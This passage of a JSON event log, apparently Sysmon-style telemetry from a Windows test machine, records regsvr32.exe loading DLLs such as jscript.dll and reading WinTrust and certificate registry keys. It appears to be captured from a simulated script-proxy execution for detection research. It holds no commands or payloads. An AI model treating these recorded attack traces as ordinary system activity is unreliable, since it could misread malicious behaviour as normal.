"process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ncryptsslp.dll", - "image_path": "C:\\Windows\\System32\\ncryptsslp.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573239170000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240110000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "wldp.dll", - "image_path": "C:\\Windows\\System32\\wldp.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240110000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240110000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "userenv.dll", - "image_path": "C:\\Windows\\System32\\userenv.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240270000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "mpr.dll", - "image_path": "C:\\Windows\\System32\\mpr.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "sxs.dll", - "image_path": "C:\\Windows\\System32\\sxs.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "gpapi.dll", - "image_path": "C:\\Windows\\System32\\gpapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreUAPCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", - "registry_value": "DelegateFolders", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "jscript.dll", - "image_path": "C:\\Windows\\System32\\jscript.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240270000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573240740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573240890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 